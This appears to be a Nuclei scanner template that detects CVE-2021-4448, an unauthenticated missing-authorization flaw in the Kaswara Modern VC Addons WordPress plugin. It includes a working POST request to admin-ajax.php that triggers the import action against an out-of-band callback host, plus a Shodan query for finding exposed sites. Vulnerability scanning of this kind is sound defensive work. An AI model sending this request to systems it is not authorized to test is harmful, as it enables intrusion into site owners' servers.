id: CVE-2021-4448 info: name: Kaswara Modern VC Addons <= 3.0.1 - Missing Authorization author: daffainfo severity: high description: | The Kaswara Modern VC Addons plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 3.0.1 due to insufficient capability checking on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of unauthorized actions such as importing data, uploading arbitrary files, deleting arbitrary files, and more. impact: | Unauthenticated attackers can perform unauthorized actions including file uploads, deletions, and data import, potentially leading to site compromise. remediation: | Deactivate and delete the plugin from the server reference: - https://codecanyon.net/item/kaswara-modern-visual-composer-addons/19341477 - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kaswara/kaswara-modern-vc-addons-301-missing-authorization classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2021-4448 epss-score: 0.01381 epss-percentile: 0.69432 cwe-id: CWE-862 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 1 vendor: kaswara_project product: kaswara framework: wordpress shodan-query: html:"kaswara" tags: cve,cve2021,wp,wordpress,wp-plugin,kaswara,oast,vkev http: - raw: - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded action=kaswaraImportDemo&contentUrl=http://{{interactsh-url}}/ matchers-condition: and matchers: - type: word part: body words: - 'missing/invalid WXR version number' - type: word part: interactsh_protocol words: - 'http' - type: status status: - 200 # digest: 4a0a00473045022100c7f10e9f9dad4d5a705ac00bc6d2ed189288c7938b08bd01b784015bf954491e02204df0bdb4415097d146a81938607276191b198002e7b8e304240e11dc19442c38:922c64590222798bb761d5b6d8e72950